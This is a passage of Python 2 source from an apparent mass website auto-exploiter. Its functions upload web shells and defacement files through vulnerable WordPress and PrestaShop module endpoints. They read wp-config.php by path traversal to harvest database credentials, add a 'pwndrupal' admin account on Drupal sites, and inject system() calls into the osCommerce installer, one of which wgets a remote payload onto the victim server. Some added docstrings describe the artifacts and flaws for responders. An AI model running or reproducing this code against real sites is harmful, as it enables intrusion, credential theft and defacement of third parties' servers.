  1883. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif', timeout=5)
  1884. if 'GIF89a' in CheckRev12.text.encode('utf-8'):
  1885. ShellCheck = requests.get('http://' + site +
  1886. '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php', timeout=5)
  1887. if 'Vuln!!' in ShellCheck.text.encode('utf-8'):
  1888. self.Print_vuln_Shell(
  1889. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php')
  1890. with open('result/Shell_results.txt', 'a') as writer:
  1891. writer.write(
  1892. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/vuln.php' + '\n')
  1893. self.Print_Vuln_index(
  1894. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif')
  1895. with open('result/Index_results.txt', 'a') as writer:
  1896. writer.write(
  1897. site + '/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/pwn.gif' + '\n')
  1898. self.Revslider_Config(site)
  1899. else:
  1900. self.Revslider_Config(site)
  1901. else:
  1902. self.Print_NotVuln('revslider', site)
  1903. except:
  1904. self.Print_NotVuln('revslider', site)
  1905.  
  1906. def Revslider_Config(self, site):
  1907. try:
  1908. Exp = 'http://' + site + \
  1909. '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php'
  1910. GetConfig = requests.get(Exp, timeout=5)
  1911. if 'DB_PASSWORD' in GetConfig.text.encode('utf-8'):
  1912. self.Print_vuln_Config(site)
  1913. with open('result/Config_results.txt', 'a') as ww:
  1914. ww.write('Full Config Path : ' + Exp + '\n')
  1915. try:
  1916. Gethost = re.findall("'DB_HOST', '(.*)'", GetConfig.text.encode('utf-8'))
  1917. Getuser = re.findall("'DB_USER', '(.*)'", GetConfig.text.encode('utf-8'))
  1918. Getpass = re.findall("'DB_PASSWORD', '(.*)'", GetConfig.text.encode('utf-8'))
  1919. Getdb = re.findall("'DB_NAME', '(.*)'", GetConfig.text.encode('utf-8'))
  1920. with open('result/Config_results.txt', 'a') as ww:
  1921. ww.write(' Host: ' + Gethost[0] + '\n' + ' user: ' + Getuser[0] +
  1922. '\n' + ' pass: ' + Getpass[0] + '\n' + ' DB: ' + Getdb[
  1923. 0] + '\n---------------------\n')
  1924. self.Revslider_css(site)
  1925. except:
  1926. self.Revslider_css(site)
  1927. else:
  1928. self.Revslider_css(site)
  1929. except:
  1930. self.Revslider_css(site)
  1931.  
  1932. def viral_optins(self, site):
  1933. try:
  1934. defaceFile = {
  1935. 'Filedata': ('vuln.txt', open(self.TextindeX, 'rb'), 'text/html')
  1936. }
  1937. x = requests.post('http://' + site + '/wp-content/plugins/viral-optins/api/uploader/file-uploader.php',
  1938. files=defaceFile, timeout=5)
  1939. if 'id="wpvimgres"' in x.text.encode('utf-8'):
  1940. uploader = site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt'
  1941. GoT = requests.get('http://' + uploader, timeout=5)
  1942. find = re.findall('<img src="http://(.*)" height="', x.text.encode('utf-8'))
  1943. GoT2 = requests.get('http://' + find[0], timeout=5)
  1944. print find[0]
  1945. if 'Vuln!!' in GoT.text.encode('utf-8'):
  1946. self.Print_Vuln_index(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt')
  1947. with open('result/Index_results.txt', 'a') as writer:
  1948. writer.write(site + '/wp-content/uploads/20' + self.year + '/' + self.month + '/vuln.txt' + '\n')
  1949. elif 'Vuln!!' in GoT2.text.encode('utf-8'):
  1950. self.Print_Vuln_index(find[0])
  1951. with open('result/Index_results.txt', 'a') as writer:
  1952. writer.write(site + find[0] + '\n')
  1953. else:
  1954. self.Print_NotVuln('viral optins', site)
  1955. else:
  1956. self.Print_NotVuln('viral optins', site)
  1957. except:
  1958. self.Print_NotVuln('viral optins', site)
  1959.  
  1960.  
  1961. def Woocomrece(self, site):
  1962. try:
  1963. Exp = 'http://' + site + '/wp-admin/admin-ajax.php'
  1964. Postdata = {'action': 'nm_personalizedproduct_upload_file', 'name': 'upload.php'}
  1965. FileData = {'file': (self.pagelinesExploitShell.split('/')[1], open(self.pagelinesExploitShell, 'rb'),
  1966. 'multipart/form-data')}
  1967. GoT = requests.post(Exp, files=FileData, data=Postdata, timeout=5)
  1968. if GoT.status_code == 200 or 'success' in GoT.text.encode('utf-8'):
  1969. UploadPostPath = 'http://' + site + '/wp-content/uploads/product_files/upload.php'
  1970. CheckShell = requests.get(UploadPostPath, timeout=5)
  1971. if 'Vuln!!' in CheckShell.text.encode('utf-8'):
  1972. shellChecker = requests.get('http://' + site + '/wp-content/vuln.php', timeout=5)
  1973. if 'Vuln!!' in shellChecker.text.encode('utf-8'):
  1974. self.Print_vuln_Shell(site + '/wp-content/vuln.php')
  1975. with open('result/Shell_results.txt', 'a') as writer:
  1976. writer.write(site + '/wp-content/vuln.php' + '\n')
  1977. IndexCheck = requests.get('http://' + site + '/vuln.htm', timeout=5)
  1978. if 'Vuln!!' in IndexCheck.text.encode('utf-8'):
  1979. self.Print_Vuln_index(site + '/vuln.htm')
  1980. with open('result/Index_results.txt', 'a') as writer:
  1981. writer.write(site + '/vuln.htm' + '\n')
  1982. else:
  1983. self.Print_NotVuln('Woocomrece', site)
  1984. else:
  1985. self.Print_NotVuln('Woocomrece', site)
  1986. else:
  1987. self.Print_NotVuln('Woocomrece', site)
  1988. except:
  1989. self.Print_NotVuln('Woocomrece', site)
  1990.  
  1991.  
  1992. def FckPath(self, zzz):
  1993. try:
  1994. find = re.findall(',"(.*)","', zzz)
  1995. path = find[0].strip()
  1996. return path
  1997. except:
  1998. pass
  1999.  
    def FckEditor(self, site):
        """Probe an FCKeditor PHP file-manager connector for unauthenticated upload.

        Requests ``upload.php?Type=Media`` and treats an ``OnUploadCompleted(202``
        callback in the body as the connector answering.  It then posts
        ``self.Jce_Deface_image`` as ``NewFile`` with a fixed Firefox 36
        User-Agent, reads the stored path back out of the response with
        ``FckPath`` and fetches it twice (status check, then content check)
        before appending a hit to ``result/Index_results.txt`` when the body
        contains the ``GIF89a`` magic.  Every failure path, including any
        exception, is reported through ``Print_NotVuln``, so network errors
        and true negatives are indistinguishable in the output.
        """
        try:
            exp2 = '/fckeditor/editor/filemanager/connectors/php/upload.php?Type=Media'
            try:
                CheckVuln = requests.get('http://' + site + exp2, timeout=5)
                if 'OnUploadCompleted(202' in CheckVuln.text.encode('utf-8'):
                    # Static UA string on every probe; a usable signature in access logs.
                    headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; rv:36.0) Gecko/20100101 Firefox/36.0',
                               'Accept': '*/*'}
                    exp = 'http://' + site + exp2
                    po = {'Content_Type': 'form-data'}
                    # The handle is never closed; one descriptor leaks per call.
                    fil = {'NewFile': open(self.Jce_Deface_image, 'rb')}
                    rr = requests.post(exp, data=po, headers=headers, timeout=10, files=fil)
                    if '.gif' in rr.text.encode('utf-8'):
                        # FckPath returns None when its regex finds nothing, so x may end in 'None'.
                        zart = self.FckPath(rr.text.encode('utf-8'))
                        x = 'http://' + site + str(zart)
                        wcheck2 = requests.get(x, timeout=5)
                        if wcheck2.status_code == 200:
                            # Second GET of the same URL; wcheck2 already holds the body.
                            check_deface = requests.get(x, timeout=10)
                            if 'GIF89a' in check_deface.text.encode('utf-8'):
                                self.Print_Vuln_index(site + str(zart))
                                with open('result/Index_results.txt', 'a') as writer:
                                    writer.write(site + str(zart) + '\n')
                            else:
                                self.Print_NotVuln('fckeditor', site)
                        else:
                            self.Print_NotVuln('fckeditor', site)
                    else:
                        self.Print_NotVuln('fckeditor', site)
                else:
                    self.Print_NotVuln('fckeditor', site)
            except:
                self.Print_NotVuln('fckeditor', site)
        except:
            self.Print_NotVuln('fckeditor', site)
  2034.  
    def Drupal_Sqli_Addadmin(self, site):
        """Hand ``site`` to the bundled ``files/adminTakeoverdupal.py`` helper.

        The helper is invoked with a fixed username/password pair
        (``pwndrupal``), so a successful run presumably leaves an account of
        that name on the Drupal site -- a direct indicator for responders.
        ``site`` is interpolated unquoted into a shell command string, so any
        shell metacharacters in a target-list entry are executed on the host
        running this script.  No result is captured or returned.
        """
        os.system('python files/adminTakeoverdupal.py -t http://' + site + ' -u pwndrupal -p pwndrupal')
  2037.  
    def osCommerce(self, site):
        """Attempt the osCommerce installer code-injection against ``site``.

        Stage one: if ``/install/index.php`` answers (the ``Welcome to osCommerce``
        text check is effectively bypassed by ``or status_code == 200``), the
        installer's ``step=4`` form is posted with a ``DB_DATABASE`` value that
        closes the generated PHP string and appends a ``system()`` call; the
        follow-up GET of ``install/includes/configure.php`` is presumably what
        executes it, writing ``Vuln!!`` to ``../../vuln.htm`` (the web root).
        Stage two, only once that marker is confirmed: the same injection
        ``wget``s a payload from a hard-coded raw.githubusercontent.com URL.
        Artifacts on a hit: a rewritten ``install/includes/configure.php``,
        ``/vuln.htm``, and ``OsComPayLoad.php`` / ``vuln.php`` under
        ``/install/includes/``, plus outbound HTTPS from the web host to GitHub.
        Any exception in stage one is reported as not vulnerable; stage-two
        exceptions are silently dropped.
        """
        try:
            CheckVuln = requests.get('http://' + site + '/install/index.php', timeout=5)
            if 'Welcome to osCommerce' in CheckVuln.text.encode('utf-8') or CheckVuln.status_code == 200:
                Exp = site + '/install/install.php?step=4'
                data = {
                    'DIR_FS_DOCUMENT_ROOT': './'
                }
                shell = '\');'
                shell += 'system("wget https://raw.githubusercontent.com/04x/ICG-AutoExploiterBoT/master/files/OsComPayLoad.php");'
                shell += '/*'
                deface = '\');'
                deface += 'system("echo Vuln!! patch it Now!> ../../vuln.htm");'
                deface += '/*'
                data['DB_DATABASE'] = deface
                r = requests.post(url='http://' + Exp, data=data, timeout=5)
                if r.status_code == 200:
                    requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
                    CheckIndex = requests.get('http://' + site + '/vuln.htm', timeout=5)
                    if 'Vuln!!' in CheckIndex.text.encode('utf-8'):
                        self.Print_Vuln_index(site + '/vuln.htm')
                        with open('result/Index_results.txt', 'a') as writer:
                            # Records '/vuln.txt' although '/vuln.htm' is what was verified above.
                            writer.write(site + '/vuln.txt' + '\n')
                        try:
                            data['DB_DATABASE'] = shell
                            requests.post(url='http://' + Exp, data=data, timeout=5)
                            requests.get('http://' + site + '/install/includes/configure.php', timeout=5)
                            requests.get('http://' + site + '/install/includes/OsComPayLoad.php', timeout=5)
                            Checkshell = requests.get('http://' + site + '/install/includes/vuln.php', timeout=5)
                            if 'Vuln!!' in Checkshell.text.encode('utf-8'):
                                # Reports a WordPress-style path even though the check hit /install/includes/vuln.php.
                                self.Print_vuln_Shell(site + '/wp-content/vuln.php')
                                with open('result/Shell_results.txt', 'a') as writer:
                                    writer.write(site + '/wp-content/vuln.php' + '\n')
                        except:
                            pass
                    else:
                        self.Print_NotVuln('osCommerce RCE', site)
                else:
                    self.Print_NotVuln('osCommerce RCE', site)
            else:
                self.Print_NotVuln('osCommerce RCE', site)
        except:
            self.Print_NotVuln('osCommerce RCE', site)
  2081.  
    def columnadverts(self, site):
        """Probe the columnadverts PrestaShop module's ``uploadimage.php``.

        Posts ``self.Jce_Deface_image`` as the ``userfile`` field; a response
        containing ``success`` is taken as acceptance and the file is expected
        at ``/modules/columnadverts/slides/<basename>``.  Only if that URL
        serves the ``GIF89a`` magic is ``self.ShellPresta`` posted the same way
        and checked for the ``Vuln!!`` marker.  Hits are appended to
        ``result/Index_results.txt`` / ``result/Shell_results.txt``.  Both file
        handles are opened without being closed, and any exception is reported
        as not vulnerable.
        """
        try:
            Exp = site + '/modules/columnadverts/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/columnadverts/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    # Logged without the host prefix, unlike the shell path below.
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/columnadverts/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(site + ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(site + ShellPath + '\n')
                else:
                    self.Print_NotVuln('columnadverts', site)
            else:
                self.Print_NotVuln('columnadverts', site)
        except:
            self.Print_NotVuln('columnadverts', site)
  2108.  
    def soopamobile(self, site):
        """Probe the soopamobile PrestaShop module's ``uploadimage.php``.

        Same flow as ``columnadverts``: ``self.Jce_Deface_image`` is posted as
        ``userfile``, ``success`` in the reply is treated as acceptance, and the
        file is expected at ``/modules/soopamobile/slides/<basename>``.  When
        that URL contains the ``GIF89a`` magic, ``self.ShellPresta`` is posted
        and checked for ``Vuln!!``.  Here both the index and shell paths are
        recorded without the host prefix.  Exceptions are reported as not
        vulnerable; the two file handles are never closed.
        """
        try:
            Exp = site + '/modules/soopamobile/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/soopamobile/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/soopamobile/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        # Path only -- no site prefix -- so the result line is not directly resolvable.
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('soopamobile', site)
            else:
                self.Print_NotVuln('soopamobile', site)
        except:
            self.Print_NotVuln('soopamobile', site)
  2135.  
  2136.  
    def soopabanners(self, site):
        """Probe the soopabanners PrestaShop module's ``uploadimage.php``.

        Identical flow to ``soopamobile`` with the module directory swapped:
        image posted as ``userfile``, ``success`` taken as acceptance, file
        expected under ``/modules/soopabanners/slides/``, then the
        ``self.ShellPresta`` upload and ``Vuln!!`` check.  Paths are recorded
        without the host prefix; exceptions are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/soopabanners/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/soopabanners/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/soopabanners/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('soopabanners', site)
            else:
                self.Print_NotVuln('soopabanners', site)
        except:
            self.Print_NotVuln('soopabanners', site)
  2163.  
  2164.  
    def vtermslideshow(self, site):
        """Probe the vtermslideshow PrestaShop module's ``uploadimage.php``.

        Same ``userfile`` upload flow as the other ``/modules/*/uploadimage.php``
        probes; artifacts land under ``/modules/vtermslideshow/slides/``.
        Detection of the image relies on ``GIF89a`` in the body, of the second
        file on ``Vuln!!``.  Results are recorded without the host prefix and
        any exception is reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/vtermslideshow/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/vtermslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/vtermslideshow/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('vtermslideshow', site)
            else:
                self.Print_NotVuln('vtermslideshow', site)
        except:
            self.Print_NotVuln('vtermslideshow', site)
  2191.  
    def simpleslideshow(self, site):
        """Probe the simpleslideshow PrestaShop module's ``uploadimage.php``.

        Same ``userfile`` upload flow as the sibling module probes; artifacts
        are expected under ``/modules/simpleslideshow/slides/``.  ``GIF89a`` in
        the fetched body confirms the image, ``Vuln!!`` confirms the second
        file.  Paths are recorded without the host prefix; exceptions are
        reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/simpleslideshow/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/simpleslideshow/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/simpleslideshow/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('simpleslideshow', site)
            else:
                self.Print_NotVuln('simpleslideshow', site)
        except:
            self.Print_NotVuln('simpleslideshow', site)
  2218.  
    def productpageadverts(self, site):
        """Probe the productpageadverts PrestaShop module's ``uploadimage.php``.

        Same ``userfile`` upload flow as the sibling module probes; artifacts
        are expected under ``/modules/productpageadverts/slides/``.  ``GIF89a``
        confirms the image, ``Vuln!!`` the second file.  Paths are recorded
        without the host prefix; exceptions are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/productpageadverts/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/productpageadverts/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/productpageadverts/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('productpageadverts', site)
            else:
                self.Print_NotVuln('productpageadverts', site)
        except:
            self.Print_NotVuln('productpageadverts', site)
  2245.  
    def homepageadvertise(self, site):
        """Probe the homepageadvertise PrestaShop module's ``uploadimage.php``.

        Same ``userfile`` upload flow as the sibling module probes; artifacts
        are expected under ``/modules/homepageadvertise/slides/``.  ``GIF89a``
        confirms the image, ``Vuln!!`` the second file.  Paths are recorded
        without the host prefix; exceptions are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/homepageadvertise/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('homepageadvertise', site)
            else:
                self.Print_NotVuln('homepageadvertise', site)
        except:
            self.Print_NotVuln('homepageadvertise', site)
  2272.  
    def homepageadvertise2(self, site):
        """Probe the homepageadvertise2 PrestaShop module's ``uploadimage.php``.

        Same ``userfile`` upload flow as ``homepageadvertise`` with the module
        directory changed; artifacts are expected under
        ``/modules/homepageadvertise2/slides/``.  Paths are recorded without
        the host prefix; exceptions are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/homepageadvertise2/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/homepageadvertise2/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/homepageadvertise2/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('homepageadvertise2', site)
            else:
                self.Print_NotVuln('homepageadvertise2', site)
        except:
            self.Print_NotVuln('homepageadvertise2', site)
  2299.  
    def jro_homepageadvertise(self, site):
        """Probe the jro_homepageadvertise PrestaShop module's ``uploadimage.php``.

        Same ``userfile`` upload flow as the sibling module probes; artifacts
        are expected under ``/modules/jro_homepageadvertise/slides/``.
        ``GIF89a`` confirms the image, ``Vuln!!`` the second file.  Paths are
        recorded without the host prefix; exceptions are reported as not
        vulnerable.
        """
        try:
            Exp = site + '/modules/jro_homepageadvertise/uploadimage.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if 'success' in GoT.text.encode('utf-8'):
                IndexPath = '/modules/jro_homepageadvertise/slides/' + self.Jce_Deface_image.split('/')[1]
                CheckIndex = requests.get('http://' + site + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    ShellPath = '/modules/jro_homepageadvertise/slides/' + self.ShellPresta.split('/')[1]
                    CheckShell = requests.get('http://' + site + ShellPath, timeout=5)
                    if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                        self.Print_vuln_Shell(ShellPath)
                        with open('result/Shell_results.txt', 'a') as writer:
                            writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('jro_homepageadvertise', site)
            else:
                self.Print_NotVuln('jro_homepageadvertise', site)
        except:
            self.Print_NotVuln('jro_homepageadvertise', site)
  2326.  
    def attributewizardpro(self, site):
        """Probe the attributewizardpro PrestaShop module's ``file_upload.php``.

        Posts ``self.Jce_Deface_image`` as ``userfile``.  If the file's basename
        appears in the reply, the text before the first ``|||`` is taken as the
        stored name under ``/modules/attributewizardpro/file_uploads/`` and
        fetched; ``GIF89a`` in the body counts as a hit.  ``self.ShellPresta``
        is then posted the same way, though the condition that gates its check
        reads ``GoT`` (the first reply) rather than ``Got2``.  Hits are appended
        to ``result/Index_results.txt`` / ``result/Shell_results.txt``; any
        exception is reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/attributewizardpro/file_upload.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
                Index = GoT.text.encode('utf-8').split('|||')[0]
                # Debug print of the raw stored filename to stdout.
                print Index
                IndexPath = site + '/modules/attributewizardpro/file_uploads/' + Index
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
                        Shell = Got2.text.encode('utf-8').split('|||')[0]
                        ShellPath = site + '/modules/attributewizardpro/file_uploads/' + Shell
                        CheckShell = requests.get('http://' + ShellPath, timeout=5)
                        if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                            self.Print_vuln_Shell(ShellPath)
                            with open('result/Shell_results.txt', 'a') as writer:
                                writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('attributewizardpro', site)
            else:
                self.Print_NotVuln('attributewizardpro', site)
        except:
            self.Print_NotVuln('attributewizardpro', site)
  2357.  
  2358.  
    def attributewizardpro2(self, site):
        """Probe the ``1attributewizardpro`` module directory's ``file_upload.php``.

        Same flow as ``attributewizardpro`` with the module path changed:
        stored name parsed from the text before ``|||``, artifacts expected
        under ``/modules/1attributewizardpro/file_uploads/``.  The shell
        follow-up is again gated on ``GoT`` rather than ``Got2``.  Exceptions
        are reported as not vulnerable.
        """
        try:
            Exp = site + '/modules/1attributewizardpro/file_upload.php'
            FileDataIndex = {'userfile': open(self.Jce_Deface_image, 'rb')}
            FileDataShell = {'userfile': open(self.ShellPresta, 'rb')}
            GoT = requests.post('http://' + Exp, files=FileDataIndex, timeout=5)
            if self.Jce_Deface_image.split('/')[1] in GoT.text.encode('utf-8'):
                Index = GoT.text.encode('utf-8').split('|||')[0]
                # Debug print of the raw stored filename to stdout.
                print Index
                IndexPath = site + '/modules/1attributewizardpro/file_uploads/' + Index
                CheckIndex = requests.get('http://' + IndexPath, timeout=5)
                if 'GIF89a' in CheckIndex.text.encode('utf-8'):
                    self.Print_Vuln_index(IndexPath)
                    with open('result/Index_results.txt', 'a') as writer:
                        writer.write(IndexPath + '\n')
                    Got2 = requests.post('http://' + Exp, files=FileDataShell, timeout=5)
                    if self.ShellPresta.split('/')[1] in GoT.text.encode('utf-8'):
                        Shell = Got2.text.encode('utf-8').split('|||')[0]
                        ShellPath = site + '/modules/1attributewizardpro/file_uploads/' + Shell
                        CheckShell = requests.get('http://' + ShellPath, timeout=5)
                        if 'Vuln!!' in CheckShell.text.encode('utf-8'):
                            self.Print_vuln_Shell(ShellPath)
                            with open('result/Shell_results.txt', 'a') as writer:
                                writer.write(ShellPath + '\n')
                else:
                    self.Print_NotVuln('1attributewizardpro', site)
            else:
                self.Print_NotVuln('1attributewizardpro', site)
        except:
            self.Print_NotVuln('1attributewizardpro', site)
  2389.  
    def attributewizardpro3(self, site):
        """Probe the ``attributewizardpro.OLD`` module directory's ``file_upload.php``.

        Same flow as ``attributewizardpro``; artifacts are expected under
        ``/modules/attributewizardpro.OLD/file_uploads/``.  The shell follow-up
        is gated on ``GoT`` rather than ``Got2``.  Exceptions are reported as
        not vulnerable.
        """
        try:
            Exp = site + '/modules/attributewizardpro.OLD/file_upload.php'
